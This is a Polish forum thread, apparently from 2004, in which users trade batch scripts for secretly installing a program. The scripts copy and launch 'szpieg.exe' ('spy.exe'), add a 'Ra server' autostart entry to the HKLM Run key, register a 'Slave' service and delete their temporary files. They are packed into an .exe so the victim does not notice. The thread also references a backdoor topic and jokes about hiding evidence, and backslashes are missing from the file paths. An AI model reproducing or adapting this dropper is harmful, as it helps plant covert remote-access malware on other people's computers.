*.bat dodający wpis do rejestru

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
"regedit /s c:plik.reg" to fajna sprawa, ale oprócz pliku *.bat (przerobiony na *.exe rzecz jasna) o takiej treści musiałbym dodać "plik.reg" - a to już podejrzane
smile.gif
.
Więc, czy jest jakiś sposób zeby SAM plik *.bat dodał jakiś wpis do rejestru?? Bo w składni regedit jakoś takiej możliwości nie widzę.
Tego na forum nie znalazłem
smile.gif
. Dzięki

PS. Co sądzicie o Calimocho??
 

lorenzo

Użytkownik
Dołączył
Listopad 2, 2003
Posty
12
Mam pomysł jak to zrobić

Barca ja to wszystko zrobiłbym tak-patrz i ucz się od zawodowego kodera:p :

Ty chcesz wszystko zrobić żeby było w 1 pliku i żeby nie było pliku "plik.reg" nie ma sprawy.

otwierasz notatnik
<
w nim piszesz:
--------------------------------cut here----------------------------

echo>>"plik.reg" tu_kopiujesz_cala_zawartosc_tresci_pliku.reg - ta komenda robi tymczasowo plik.reg dlatego tam to co jest w cudzysłowiu mozesz zmienic na np. kupa.reg,dupa.reg itp. następnie wciskasz spacje i musisz skopiować wszystko dokładnie co zawierał przedtem ten plik.reg.
regedit /s c:plik.reg - tutaj dodajesz ten wpis do rejestru
echo t|del plik.reg - po dodaniu plik.reg zostaje bez gadania usuniety(nie widać go wogóle gdyz jest tylko na moment a potem znika
smile.gif
).

a teraz przykłąd jesli masz inną nazwe klucza np. barca.reg i nie chcesz , aby był on dodawany:

-----------------------------------------cut here-----------------------------------
echo>>"barca.reg" tu_jest_tresc_tego_co_zawiera_klucz_barca
regedit /s c:barca.reg
echo t|del barca.reg
-----------------------------------------cut here-----------------------------------

kopiujesz do notatnika zapisujesz jako *.bat i masz wszystko w 1 pliku ładnie
smile.gif
.
Pozdrawiam!!
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
Hehe, pisałem ten post po północy więc chyba to zmęczenie...... przecież to już było w topicu rywina "backdoor 2", sam to robiłem
<
No ale dzięki za odpowiedź, przynajmniej zagadnienie się w jednym topicu znalazło, zainteresowani łatwiej sobie to znajdą
smile.gif

PS. Fajny opis ;-)
 

lorenzo

Użytkownik
Dołączył
Listopad 2, 2003
Posty
12
no nie wiem czy sam to robiłęś
<
:p to było dzisiaj rano
<
:p to nie wiem jak mogłeś w tak qrótkim czasie coś wykombinować
<
ale ok. Musze wpadać tu na forum częsciej
<
ostatnio byłem tu w pazdzierniku 2003 roku
<
Pozdrawiam
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
No jakbyś spojrzał na datę mojego postu w temacie rywina tobyś nie miał wątpliwości
<
a zresztą, co mi tam...
A tak w ogóle to może ktoś coś z tego rozumie: robię następujący plik bat:

@echo off
copy szpieg.exe c:winntszpieg.exe
c:winntszpieg.exe
echo>>"autorun.reg" Windows Registry Editor Version 5.00
echo. >>autorun.reg
echo>>"autorun.reg" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
echo>>"autorun.reg" "Ra server"="C:WinNTszpieg.exe"
echo. >>autorun.reg
echo>>"autorun.reg" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponents]
echo. >>autorun.reg
echo>>"autorun.reg" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsIM
AIL]
echo>>"autorun.reg" "Installed"="1"
echo. >>autorun.reg
echo>>"autorun.reg" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsMA
PI]
echo>>"autorun.reg" "Installed"="1"
echo>>"autorun.reg" "NoChange"="1"
echo. >>autorun.reg
echo>>"autorun.reg" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsMS
FS]
echo>>"autorun.reg" "Installed"="1"
echo. >>autorun.reg
echo>>"autorun.reg" [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSlave]
echo>>"autorun.reg" "ImagePath"=hex(2):53,00,6c,00,61,00,76,00,65,00,2e,00,65,00,78,00,65,00,00,00
regedit /s autorun.reg
echo t|del autorun.reg

Wszystko pięknie działa jak powinno gdy uruchamiam bat, ale gdy zmieniam go w exe (za pomocą bat2exe i c2e) to zatrzymuje się gdzieś na 2 ostatnich linijkach i pisze, że nie może dodać informacji do rejestru bo pliku nie ma lub jest uszkodzony
<
Skąd ta różnica?? Próbowałem już podawać tu wszędzie pełne ścieżki itd. itp. ale nic nie pomogło. Any help??
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
Już działa, dowiedziałem się że bat przerabiany na exe nie może być zbyt długi, jak go skróciłem do takiej postaci, to wszystko gra:

@echo off
copy data.dat c:winntszpieg.exe
echo>>"c:winntrun.reg" Windows Registry Editor Version 5.00
echo. >>c:winntrun.reg
echo>>"c:winntrun.reg" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
echo>>"c:winntrun.reg" "Ra server"="C:WinNTszpieg.exe"
regedit /s c:winntrun.reg
c:winntszpieg.exe
erase data.dat
erase szpieg.exe

PS To nie zaćmienie tylko celowe zapikselowanie zapobiegające zapuszkowaniu ;-)
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
<
No Chochlik, ale ty śmigasz po polsku
smile.gif
"zapuszkowali" - dziwię się że to kumasz po tych 5 zdajsie latach w Londynie
smile.gif
 
Do góry Bottom